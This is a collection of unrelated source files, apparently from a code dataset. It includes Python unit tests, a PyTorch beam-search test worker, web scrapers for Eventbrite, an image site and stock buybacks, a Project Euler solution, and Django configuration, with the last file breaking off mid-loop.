# update = "UPDATE wn8exp SET " + stat + " = " + "\'" + str(tank[stat]) \
# + "\'" + " WHERE id = " + str(tid) + ";"
# cursor_wn8.execute(update)
cnx_wn8.commit()
cursor_wn8.close()
cnx_wn8.close()
if __name__ == '__main__':
fill_wn8_table()
|
9,211 | ff8e8af72a8eb97a392fcfec5960eed7a2e51f68 | # Reference: https://docs.python.org/2/library/unittest.html
import unittest
import sys
sys.path.append('..')
from database_utils import DatabaseUtils
class Test_DatabaseUtils(unittest.TestCase):
def setUp(self):
self.db=DatabaseUtils()
def dataCount(self):
with self.db.connection.cursor() as cursor:
cursor.execute("select count(*) from LmsUser")
return cursor.fetchone()[0]
def test_getUser(self):
count = self.dataCount()
try:
trueResult=self.db.getUser("username")
print("Test passed")
except:
print("Test failed")
def test_insertBookTransaction(self):
testData=(1,1,"2019-01-01","abc")
result=self.db.insertBookTransaction(testData[0],testData[1],testData[2],testData[3])
print("result: ",result)
self.assertTrue(result)
def test_updateBookStatus(self):
testData=(1,"anything")
result=self.db.updateBookStatus(testData[1],testData[0])
self.assertFalse(result)
def test_updateBookTransaction(self):
testData=(1,"anything","2019-01-01")
result=self.db.updateBookTransaction(testData[0],testData[1],testData[2])
self.assertFalse(result)
def test_searchBooks(self):
result=self.db.searchBooks("abc")
self.assertFalse(result)
result=self.db.searchBooks("Harry")
self.assertTrue(result)
def test_searchBooksAuthur(self):
result=self.db.searchBooksAuthur("abc")
self.assertFalse(result)
result=self.db.searchBooksAuthur("gavin")
self.assertTrue(result)
def test_searchBooksISBN(self):
result=self.db.searchBooksISBN(1)
self.assertFalse(result)
def test_listBooks(self):
result=self.db.listBooks()
self.assertTrue(result)
def test_getBook(self):
result=self.db.getBook(1)
self.assertTrue(result)
def test_getBookISBN(self):
result=self.db.getBookISBN(1)
self.assertFalse(result)
def test_listReturnBooks(self):
result=self.db.listReturnBooks(1)
self.assertTrue(result)
def test_getReturnBook(self):
result=self.db.getReturnBook(1,1)
self.assertTrue(result)
if __name__ == "__main__":
unittest.main() |
9,212 | c7333d838b87d4c275d9dbb6d7e3047c313b4bc0 | import torch
import torch.nn as nn
from tqdm import tqdm
import torch.nn.functional as F
import torch.multiprocessing as mp
from policy_network import Policy_Network
from util import safe_log
from util import index2word, rearrange_vector_list, get_num_gpus, set_seed
class TestWorker(mp.Process):
def __init__(self, args, worker_id, env, d_entity_neighours, d_entity2bucketid, d_action_space_buckets, d_entity2id, d_relation2id, reqa_checkpoint_path, d_results, word_num, entity_num, relation_num, keqa_checkpoint_path, return_trace = False):
super().__init__(name='test-worker-%02d' % (worker_id))
self.args = args
self.seed = args.seed + worker_id
self.fix_batch_size = args.batch_size
self.use_keqa_vector = args.use_keqa_vector
self.max_hop = args.max_hop
self.beam_size = args.beam_size
self.return_trace = return_trace
self.d_entity_neighours = d_entity_neighours
self.d_entity2bucketid = d_entity2bucketid
self.d_action_space_buckets = d_action_space_buckets
self.id2entity = index2word(d_entity2id)
self.id2relation = index2word(d_relation2id)
self.worker_id = worker_id
self.gpu_id = self.worker_id % get_num_gpus()
self.env = env
self.d_results = d_results
self.reqa_checkpoint_path = reqa_checkpoint_path
self.word_num = word_num
self.entity_num = entity_num
self.relation_num = relation_num
self.keqa_checkpoint_path = keqa_checkpoint_path
def run(self):
set_seed(self.seed)
self.model = Policy_Network(self.args, self.word_num, self.entity_num, self.relation_num, self.keqa_checkpoint_path, self.gpu_id)
self.model.load(self.reqa_checkpoint_path)
self.model.cuda(self.gpu_id)
self.model.eval()
self.env.set_model(self.model)
self.env.set_gpu_id(self.gpu_id)
total_data_num = len(self.env.d_dataset)
hits_1_num = 0
with torch.no_grad():
for example_id in tqdm(range(0, len(self.env.d_dataset), self.fix_batch_size), desc=self.name, position=self.worker_id):
idx = range(example_id, example_id + self.fix_batch_size)
self.env.reset(idx)
self.batch_size = self.env.batch_size
batch_hits1 = self.rollout()
hits_1_num += batch_hits1
hits_1_result = 1.0 * hits_1_num / total_data_num
self.d_results['hits@1'] = hits_1_result
def rollout(self):
batch_question, batch_question_len, batch_head, batch_answers = self.env.return_batch_data()
if self.return_trace:
l_search_trace = []
l_log_action_probs = []
batch_pred_vector = None
if self.use_keqa_vector:
batch_pred_vector = self.model.get_anticipated_entity_vector(batch_head, batch_question, batch_question_len, self.d_entity_neighours)
log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)
for t in range(self.max_hop):
path_trace, path_hidden = self.env.observe()
last_r, e_t = path_trace[-1]
batch_path_hidden = path_hidden[-1][0][-1, :, :]
k = int(e_t.size()[0] / self.batch_size)
beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1)
beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k).view(self.batch_size * k)
beam_pred_vector = None
if self.use_keqa_vector:
beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1)
db_outcomes, _, _, inv_offset = self.model.transit(t, e_t, beam_question, beam_question_len, batch_path_hidden, self.d_entity2bucketid, self.d_action_space_buckets, last_r, False, beam_pred_vector)
db_action_spaces = [action_space for action_space, _ in db_outcomes]
db_action_dist = [action_dist for _, action_dist in db_outcomes]
action_space = self.pad_and_cat_action_space(db_action_spaces, inv_offset)
action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[inv_offset]
log_action_dist = log_action_prob.view(-1, 1) + safe_log(action_dist)
if self.return_trace:
print(t)
print(last_r, e_t)
print("----")
print(action_space[0])
print(F.softmax(log_action_dist.view(-1)).view(self.batch_size * k, -1))
print("------------------------")
if t == self.max_hop - 1:
action, log_action_prob, action_offset = self.top_k_answer_unique(log_action_dist, action_space)
else:
action, log_action_prob, action_offset = self.top_k_action(log_action_dist, action_space)
path_list, (h_t, c_t) = self.model.update_path(action, path_hidden, offset = action_offset)
self.env.step(action, path_list, (h_t, c_t))
if self.return_trace:
rearrange_vector_list(l_log_action_probs, action_offset)
l_log_action_probs.append(log_action_prob)
self.adjust_search_trace(l_search_trace, action_offset)
l_search_trace.append(action)
batch_pred_e2 = action[1].view(self.batch_size, -1)
batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)
batch_hits1 = torch.sum(torch.gather(batch_answers, 1, batch_pred_e2_top1).view(-1)).item()
if self.return_trace:
self.print_search_trace(batch_head, l_search_trace, l_log_action_probs)
return batch_hits1
def top_k_action(self, log_action_dist, action_space):
full_size = len(log_action_dist)
last_k = int(full_size / self.batch_size)
(r_space, e_space), _ = action_space
action_space_size = r_space.size()[1]
log_action_dist = log_action_dist.view(self.batch_size, -1)
beam_action_space_size = log_action_dist.size()[1]
k = min(self.beam_size, beam_action_space_size)
log_action_prob, action_ind = torch.topk(log_action_dist, k)
next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind).view(-1)
next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind).view(-1)
log_action_prob = log_action_prob.view(-1)
action_beam_offset = action_ind // action_space_size
action_batch_offset = (torch.arange(self.batch_size).cuda(self.gpu_id) * last_k).unsqueeze(1)
action_offset = (action_batch_offset + action_beam_offset).view(-1)
return (next_r, next_e), log_action_prob, action_offset
def top_k_answer_unique(self, log_action_dist, action_space):
full_size = len(log_action_dist)
last_k = int(full_size / self.batch_size)
(r_space, e_space), _ = action_space
action_space_size = r_space.size()[1]
r_space = r_space.view(self.batch_size, -1)
e_space = e_space.view(self.batch_size, -1)
log_action_dist = log_action_dist.view(self.batch_size, -1)
beam_action_space_size = log_action_dist.size()[1]
k = min(self.beam_size, beam_action_space_size)
next_r_list, next_e_list = [], []
log_action_prob_list = []
action_offset_list = []
for i in range(self.batch_size):
log_action_dist_b = log_action_dist[i]
r_space_b = r_space[i]
e_space_b = e_space[i]
unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self.gpu_id)
unique_log_action_dist, unique_idx = self.unique_max(unique_e_space_b, e_space_b, log_action_dist_b)
k_prime = min(len(unique_e_space_b), k)
top_unique_log_action_dist, top_unique_idx2 = torch.topk(unique_log_action_dist, k_prime)
top_unique_idx = unique_idx[top_unique_idx2]
top_unique_beam_offset = top_unique_idx // action_space_size
top_r = r_space_b[top_unique_idx]
top_e = e_space_b[top_unique_idx]
next_r_list.append(top_r.unsqueeze(0))
next_e_list.append(top_e.unsqueeze(0))
log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0))
top_unique_batch_offset = i * last_k
top_unique_action_offset = top_unique_batch_offset + top_unique_beam_offset
action_offset_list.append(top_unique_action_offset.unsqueeze(0))
next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)
next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)
log_action_prob = self.pad_and_cat(log_action_prob_list, padding_value = -float("inf"))
action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)
return (next_r, next_e), log_action_prob.view(-1), action_offset.view(-1)
def sync_model(self):
self.model.load_state_dict(self.shared_model.state_dict())
def pad_and_cat_action_space(self, action_spaces, inv_offset):
db_r_space, db_e_space, db_action_mask = [], [], []
for (r_space, e_space), action_mask in action_spaces:
db_r_space.append(r_space)
db_e_space.append(e_space)
db_action_mask.append(action_mask)
r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]
e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]
action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[inv_offset]
action_space = ((r_space, e_space), action_mask)
return action_space
def pad_and_cat(self, a, padding_value, padding_dim=1):
max_dim_size = max([x.size()[padding_dim] for x in a])
padded_a = []
for x in a:
if x.size()[padding_dim] < max_dim_size:
res_len = max_dim_size - x.size()[1]
pad = nn.ConstantPad1d((0, res_len), padding_value)
padded_a.append(pad(x))
else:
padded_a.append(x)
return torch.cat(padded_a, dim=0).cuda(self.gpu_id)
def unique_max(self, unique_x, x, values, marker_2D=None):
unique_interval = 100
HUGE_INT = 1e31
unique_values, unique_indices = [], []
for i in range(0, len(unique_x), unique_interval):
unique_x_b = unique_x[i:i+unique_interval]
marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()
values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D) * HUGE_INT
unique_values_b, unique_idx_b = values_2D.max(dim=1)
unique_values.append(unique_values_b)
unique_indices.append(unique_idx_b)
unique_values = torch.cat(unique_values).cuda(self.gpu_id)
unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)
return unique_values, unique_idx
def adjust_search_trace(self, search_trace, action_offset):
for i, (r, e) in enumerate(search_trace):
new_r = r[action_offset]
new_e = e[action_offset]
search_trace[i] = (new_r, new_e)
def print_search_trace(self, batch_head, l_search_trace, l_log_action_probs):
for i in range(self.batch_size):
top_k_edge_labels = []
for k, log_action_prob in enumerate(l_log_action_probs):
beam_size = len(log_action_prob)
for j in range(beam_size):
ind = i * beam_size + j
r = self.id2relation[int(l_search_trace[k][0][ind])]
e = self.id2entity[int(l_search_trace[k][1][ind])]
if r.endswith('_inverse'):
edge_label = '<-{}-{} {}'.format(r[:-8], e, float(log_action_prob[ind]))
else:
edge_label = '-{}->{} {}'.format(r, e, float(log_action_prob[ind]))
if k == 0:
edge_label = self.id2entity[int(batch_head[i])] + edge_label
top_k_edge_labels.append(edge_label)
else:
top_k_edge_labels[j] += edge_label
for i, edge_label in enumerate(top_k_edge_labels):
print(i, edge_label)
print("*****************************")
|
9,213 | edfc8794fab2c95e01ae254f9f13d446faafe6fd | from datetime import datetime
import logging
import os
import re
from bs4 import BeautifulSoup
import requests
from .utils.log import get_logger
logger = get_logger(os.path.basename(__file__))
EVENTBRITE_TOKEN = os.environ['EVENTBRITE_TOKEN']
def get_category_name(page):
if page["category_id"] is None:
category = ''
else:
if page["subcategory_id"] is None:
category = get(page["category_id"], 'categories/').json()["name"]
else:
category_name = get(page["category_id"], 'categories/')
category_name = category_name.json()["name"]
category_name = category_name.replace(",", "")
subcategory_name = get(page["subcategory_id"], 'subcategories/')
subcategory_name = subcategory_name.json()["name"]
subcategory_name = subcategory_name.replace(",", "")
category = category_name + "," + subcategory_name
return category
def scrape(event_id, event_cost):
page = get(event_id, resource='events').json()
venue = get(page["venue_id"], resource='venues').json()
start = datetime.strptime(page['start']['local'], '%Y-%m-%dT%H:%M:%S')
end = datetime.strptime(page['end']['local'], '%Y-%m-%dT%H:%M:%S')
desc = "(" + venue["address"]["region"] + ") " + page["summary"]
event_data = {
'Event Name': page['name']['text'],
'Event Description': desc,
'Event Start Date': start.strftime('%Y-%m-%d'),
'Event Start Time': start.strftime('%H:%M:%S'),
'Event End Date': end.strftime('%Y-%m-%d'),
'Event End Time': end.strftime('%H:%M:%S'),
'All Day Event': "False",
'Timezone': "America/New_York",
'Event Venue Name': venue["name"],
'Event Organizers': 'Sierra Club MD',
'Event Cost': event_cost,
'Event Currency Symbol': "$",
# TODO: parse event data for optional category fields if present
'Event Category': get_category_name(page),
'Event Website': page['url'],
'Event Featured Image': ""
}
return event_data
def get(api_id, resource, params={'token': EVENTBRITE_TOKEN}):
url = f'https://www.eventbrite.com/o/{api_id}' if resource == 'o' \
else f'https://www.eventbriteapi.com/v3/{resource}/{api_id}'
try:
if resource != 'o':
r = requests.get(url, params=params)
else:
r = requests.get(url)
except Exception as e:
msg = f"Exception making GET request to {url}: {e}"
logger.critical(msg, exc_info=True)
return
if not r.ok:
code = r.status_code
msg = f"Non-200 status code of {code} making GET request to: {url}"
logger.critical(msg, exc_info=True)
return r
def get_live_events(soup):
live_events = soup.find("article", {"id": "live_events"})
try:
event_divs = live_events.find_all("div", {"class": "list-card-v2"})
except AttributeError:
return []
return event_divs
def get_cost_events(soup):
cost = soup.find("span", {"class": "list-card__label"}).text
cost = cost.lower()
cost = cost.replace("free", "0")
cost = re.sub(r'[^\d]+', '', cost)
if cost == "":
cost = "0"
return cost
def main():
events_array = []
r = get(14506382808, 'o')
soup = BeautifulSoup(r.content, 'html.parser')
event_a_refs = get_live_events(soup)
for events in event_a_refs:
event_cost = get_cost_events(events)
event_id = events.find("a").get("data-eid")
events_array.append(scrape(event_id, event_cost))
return events_array
if __name__ == '__main__':
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
events = main()
print(len(events)) |
9,214 | db20a77778392c84bab50f6d4002dd11b73967b9 | '''
Find the greatest product of five consecutive digits in the 1000-digit number.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
'''
from time import time
s = '73167176531330624919225119674426574742355349194934\
96983520312774506326239578318016984801869478851843\
85861560789112949495459501737958331952853208805511\
12540698747158523863050715693290963295227443043557\
66896648950445244523161731856403098711121722383113\
62229893423380308135336276614282806444486645238749\
30358907296290491560440772390713810515859307960866\
70172427121883998797908792274921901699720888093776\
65727333001053367881220235421809751254540594752243\
52584907711670556013604839586446706324415722155397\
53697817977846174064955149290862569321978468622482\
83972241375657056057490261407972968652414535100474\
82166370484403199890008895243450658541227588666881\
16427171479924442928230863465674813919123162824586\
17866458359124566529476545682848912883142607690042\
24219022671055626321111109370544217506941658960408\
07198403850962455444362981230987879927244284909188\
84580156166097919133875499200524063689912560717606\
05886116467109405077541002256983155200055935729725\
71636269561882670428252483600823257530420752963450'
n = 0
i = 0
while i < len(s) - 4:
p = 1
if not int(s[i]):
i += 5
continue
for j in xrange(i, i+5):
p = p * int(s[j])
if not p:
i += 5
continue
elif p > n: n = p
i += 1
print n
|
9,215 | a1ce43c3f64667619c4964bc4dc67215d3ecc1a0 | # -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from meizi.items import MeiziItem
class MztspiderSpider(CrawlSpider):
name = 'mztspider2'
allowed_domains = ['meizitu.com']
start_urls = ['http://www.meizitu.com/a/list_1_%s.html' % urlnum for urlnum in range(1, 92)]
rules = (
Rule(LinkExtractor(allow='meizitu.com/a', restrict_xpaths='//ul[@class="wp-list clearfix"]/li/div/div/a'),
callback='parse_item', follow=True),
)
def parse_item(self, response):
sel = Selector(response)
srcs = sel.xpath('//div[@id="picture"]/p/img/@src').extract()
item = MeiziItem()
item['image_urls'] = srcs
yield item
|
9,216 | 6d362b87b595fc59df31d1f0bb561dc83633a2ac | array_length = int(input())
source = [int(x) for x in input().split()]
def find_neighbors():
previous_zero_index = -1
count = 0
result = []
for index, value in enumerate(source):
count += 1
if value == 0:
if index == 0:
previous_zero_index = 0
count = 0
result.append(0)
continue
if previous_zero_index == -1:
result[0: index] = reversed(result[0:index])
previous_zero_index = index
count = 0
result.append(0)
continue
result.append(0)
diff = (index - previous_zero_index) // 2
result[index - diff: index] = reversed(result[previous_zero_index + 1: previous_zero_index + 1 + diff])
previous_zero_index = index
count = 0
continue
result.append(count)
for i in result:
print(i, end=" ")
find_neighbors()
|
9,217 | 8aa9ba145b6c7347a7a926d50dca35383ddd52a3 | import unittest.mock
import assist
import pytest
def test_simple_query():
q = assist.build_query(select='time, value', from_='system_load',
where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
groupby=('host', 'L3'))
df = assist.run_query(q, cache=False)
assert not df.empty
def test_nested_query():
inner_q = assist.build_query(select='time, value, host, L3', from_='system_load',
where='L2=\'cpuload\' and "name" != \'Idle\'',
)
outer_q = assist.build_query(select='time, value', from_=inner_q,
where='time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\'',
groupby=('host', 'L3'))
df = assist.run_query(outer_q, cache=False)
assert not df.empty
def test_nested_query_with_datetime():
inner_q = assist.build_query(select='time, value', from_='system_load',
where='L2=\'cpuload\' and "name" != \'Idle\'',
groupby=('host', 'L3'))
outer_q = assist.build_query(select='time, value', from_=inner_q,
where=f'time > {assist.Datetime(year=2021, month=6, day=16)}'
f'and time < {assist.Datetime(year=2021, month=6, day=17)}',
)
df = assist.run_query(outer_q, cache=False)
assert not df.empty
def test_warning():
inner_q = assist.build_query(select='time, value', from_='system_load',
where=f'time > {assist.Datetime(year=2021, month=6, day=16)}'
f'and time < {assist.Datetime(year=2021, month=6, day=17)}'
'and L2=\'cpuload\' and "name" != \'Idle\'',
groupby=('host', 'L3'))
with pytest.warns(RuntimeWarning):
outer_q = assist.build_query(select='time, value', from_=inner_q, )
df = assist.run_query(outer_q, cache=False)
assert not df.empty
def test_time_grouping():
q = assist.build_query(select='time, MAX(value)', from_='system_load',
where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
groupby=('time(10m)', 'host', 'L3'))
df = assist.run_query(q, cache=False)
assert not df.empty
def test_fill_values():
q = assist.build_query(select='time, MEAN(value)', from_='system_load',
where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
groupby=('time(10m)', 'fill(0)', 'host', 'L3'))
df = assist.run_query(q, cache=False)
assert not df.empty
def test_cached_query():
q = assist.build_query(select='time, value', from_='system_load',
where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
groupby=('host', 'L3'))
def _run_query(q):
df = assist.run_query(q, cache=True)
return df
_run_query(q)
# Invalidate the InfluxDB client, it should still work
df = unittest.mock.patch('assist.parse.client', new=None)(_run_query)(q)
assert not df.empty
def test_nocached_query():
q = assist.build_query(select='time, value', from_='system_load',
where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
groupby=('host', 'L3'))
@unittest.mock.patch('assist.parse.client', new=None)
def _run_query(q):
df = assist.run_query(q, cache=False)
return df
# Invalidate the InfluxDB client, it should fail
with pytest.raises(AttributeError):
_run_query(q)
def test_cached_query_mv():
q = assist.build_query(select='time, value', from_='system_load',
where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
groupby=('host', 'L3'))
def _run_query(q):
df = assist.run_multivariate_query(q, cache=True)
return df
_run_query(q)
# Invalidate the InfluxDB client, it should still work
df = unittest.mock.patch('assist.parse.client', new=None)(_run_query)(q)
assert not df.empty
def test_nocached_query_mv():
q = assist.build_query(select='time, value', from_='system_load',
where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
groupby=('host', 'L3'))
@unittest.mock.patch('assist.parse.client', new=list())
def _run_query(q):
df = assist.run_multivariate_query(q, cache=False)
return df
# Invalidate the InfluxDB client, it should fail
with pytest.raises(AttributeError):
_run_query(q) |
9,218 | fbbadb5cbd2b324686fc5faa0b1bc6236fc8d87b | import json
import math
import pandas as pd
import datetime
record_file = r"D:\Doc\data\BBOS.log"
all_records = []
with open(record_file, "r") as f:
all_line = f.readlines()
for line in all_line:
record_time = line[line.index("[") + 1: line.index("]")]
record_order = json.loads(line[line.index("{"):])
for item in record_order["data"]["otherPositionRetList"]:
item["time"] = datetime.datetime.fromtimestamp(math.floor(float(record_time)/1000)).strftime(r"%Y-%m-%d %H:%M:%S")
all_records.append(item)
record_frame = pd.DataFrame(all_records)
print(record_frame.columns)
print(record_frame.sort_values(by=['symbol', 'time'] , ascending=[1,1])) |
9,219 | b779cfc6d6456a370092bf1cfa5904c869b7466a | a = 'Hello, World!'
print |
9,220 | d4b1b6bdf125f2791c219b7db579c234eda0a73c | import datetime
import calendar
import re
def cardinal(ordinal):
return int(''.join([char for char in ordinal if char.isdigit()]))
def meetup_day(year, month, day_of_week, ordinal):
days = {
0: 'Monday',
1: 'Tuesday',
2: 'Wednesday',
3: 'Thursday',
4: 'Friday',
5: 'Saturday',
6: 'Sunday'
}
possible_days = []
number_of_days = calendar.monthrange(year, month)[1]
days_of_month = [datetime.date(year, month, 1) + datetime.timedelta(days=x) for x in range(0, number_of_days)]
for day in days_of_month:
if days[day.weekday()] == day_of_week:
possible_days.append(day.day)
if ordinal == 'teenth':
for x in possible_days:
if 10 < x < 20:
day_of_month = x
elif ordinal == 'last':
day_of_month = possible_days[-1]
else:
day_of_month = possible_days[cardinal(ordinal)-1]
return datetime.date(year, month, day_of_month)
|
9,221 | 55030648a6b76636e456990c1d2b02baa35a695d | from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
print('tensorflow version: {}'.format(tf.__version__))
def __prepare_train_data(df, feature):
groups = df.groupby(['event', 'start'])
data = []
labels = []
for id, group in groups:
values = group['CylinderBorePressure'].values
# Reshape data from (history_size,) to (history_size, 1)
data.append(np.reshape(values, (len(values), 1)))
labels.append(id[0])
return np.array(data), np.array(convert_labels(labels))
def convert_labels(labels):
digit_labels = []
for label in labels:
if label == 'cut':
digit_labels.append(0.0)
elif label == 'sort':
digit_labels.append(1.0)
elif label == 'idle':
digit_labels.append(2.0)
return digit_labels
TRAIN_SPLIT = 300000
BATCH_SIZE = 256
BUFFER_SIZE = 10000
tf.random.set_seed(13)
train_df = pd.read_csv('data/st-cloud.csv')
train_df = train_df.sort_values(by=['timestamp'])
train_df = train_df.loc[(train_df['event'] == 'cut') | (train_df['event'] == 'sort') | (train_df['event'] == 'idle')]
x_train_uni, y_train_uni = __prepare_train_data(train_df, feature='CylinderBorePressure')
print(x_train_uni[0])
print(y_train_uni[0])
train_univariate = tf.data.Dataset.from_tensor_slices((x_train_uni, y_train_uni))
# train_univariate = train_univariate.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE).repeat()
#
# val_univariate = tf.data.Dataset.from_tensor_slices((x_val_uni, y_val_uni))
# val_univariate = val_univariate.batch(BATCH_SIZE).repeat()
#
# simple_lstm_model = tf.keras.models.Sequential([
# tf.keras.layers.LSTM(8, input_shape=x_train_uni.shape[-2:]),
# tf.keras.layers.Dense(1)
# ])
#
# simple_lstm_model.compile(optimizer='adam', loss='mae')
#
# for x, y in val_univariate.take(1):
# print(simple_lstm_model.predict(x).shape)
#
# EVALUATION_INTERVAL = 200
# EPOCHS = 10
#
# simple_lstm_model.fit(train_univariate, epochs=EPOCHS,
# steps_per_epoch=EVALUATION_INTERVAL,
# validation_data=val_univariate, validation_steps=50)
# for x, y in val_univariate.take(3):
# plot = show_plot([x[0].numpy(), y[0].numpy(),
# simple_lstm_model.predict(x)[0]], 0, 'Simple LSTM model')
# plot.show()
|
9,222 | b3b5f7eeb81e10a51eb0322bc5278d33ee5f8e97 | """updateimage URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from updateapp.views import jsonre_data,jsonView,JsonView2,SerializeView,Serializeall
from updateapp.api import views,urls
from django.conf.urls import url,include
urlpatterns = [
url(r'^$',jsonre_data),
url(r'^serialize/$',SerializeView.as_view()),
url(r'^serialize/$',SerializeView.as_view()),
url(r'^all/$',Serializeall.as_view()),
url(r'^cbv1/$',jsonView.as_view()),
url(r'^cbv2/$',JsonView2.as_view()),
url(r'^api/updates/',include('updateapp.api.urls')),
path('admin/', admin.site.urls),
]
|
9,223 | 58b12418a2a6b1ef9b63800b89e7f0b9fffd908c | # Generated by Django 2.2.1 on 2019-06-01 09:56
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Participant',
fields=[
('username', models.CharField(max_length=25, primary_key=True, serialize=False)),
('phone_num', models.CharField(default='', max_length=16)),
('password', models.CharField(max_length=16)),
('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),
('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),
],
),
]
|
9,224 | 276bcb2e90c30f87c618106e5e862f00d082da34 |
from bs4 import BeautifulSoup
import urllib2
import datetime
import re
import csv
import sys
import time
import bb_load as bb_l
import pandas as pd
import requests
#Scrape the web for new buybacks
def scrape_buybacks():
'''
(NoneType) -> scraped_database.csv, database=open('scrape_database.csv', 'r')
Version 3.0, MSP @ 11:00 04.06.16
'''
#Define some of the variables used
start_time = time.time()
stock_list = []
date_list = []
bb_list = []
not_added = int(0)
full_switch = 'y'
#Load reference database by external function
try:
existing_database = read_existing_scrapefile()
print ('Comparing existing database to new buybacks.')
first = existing_database[0]
first_date = first[0:first.find(',')]
full_switch = raw_input('Do a full search beyond the most recent date '\
+'in database? y/n: ')
except (IOError, Warning):
print 'Warning: No prior database available.', '\n' \
'No reference check will be conducted; proceed with a new database file.', '\n'
existing_database = []
first_date = 0
#Run a for loop to scrape all 5 pages of data
for numb in ('1', '2', '3', '4', '5'):
url = ("http://www.rttnews.com/CorpInfo/StockBuybacks.aspx?PageNum=" + numb)
try: #Scrape the page
soup = BeautifulSoup(requests.get(url).content, "html.parser")
except (Warning, IOError): #Inform of any problems
print 'Failed to scrape page number ' + numb + '.' + '\n' \
'The remote host could have terminated the connection.' + '\n' \
'Scraping terminated; try to run the program again.'
sys.exit(0)
end_search = False
#Scrape the relevant info for all announcements in ODD rows
for item in soup.select(".ecoCalContent"):
count = 0
#Scrape the relevant info for an individual announcement
for numb in ["1","2","3","4","5","6"]:
string = ".tblContent" + numb
count = count + 1
start = int(str(item.select(string)).find('">') + 2)
stop = int(str(item.select(string)).find('</'))
extract = str(item.select(string))[start:stop]
if count == 1:
date = extract
y = int(date[date.rfind("/")+1:len(date)])+2000
try:
d = int(date[date.find("/")+1:len(date)-date.find("/")-2])
except ValueError:
d = 1
m = int(date[0:date.find("/")])
date = datetime.datetime(y,m,d).strftime("%Y-%m-%d")
if count == 2:
ticker = extract[extract.find(">")+1:len(extract)]
if ticker.find(",") > 0:
while ticker.count(",") > 1: # strip until unly one comma left
ticker = ticker[ticker.find(",")+1:len(ticker)] # Strip before first comma
ticker = ticker[0:ticker.find(",")] # Strip after second comma
if ticker.find(".") > 0:
ticker = ticker[0:ticker.find(".")]
ticker = filter(str.isupper, ticker)
if count == 4:
buyback = extract
unit = buyback.join(re.findall("[a-zA-Z]+", buyback))
val = re.findall(r"[-+]?\d*\.\d+|\d+", buyback)
val = float(val[0])
if unit == "":
val = val / 1000000
elif unit == "K":
val = val / 1000
elif unit == "Bln":
val = val * 1000
date_list.append(date)
stock_list.append(ticker)
bb_list.append(val)
#Build the aggregated list and removing buybacks
#already in the existing buyback database
teststr = str(date)+','+str(ticker)+','+str(val)
if teststr in existing_database:
date_list.pop()
stock_list.pop()
bb_list.pop()
not_added = not_added + 1
#Scrape the relevant info for all announcements in EVEN rows
for item in soup.select(".ecoCalAltContent"):
count = 0
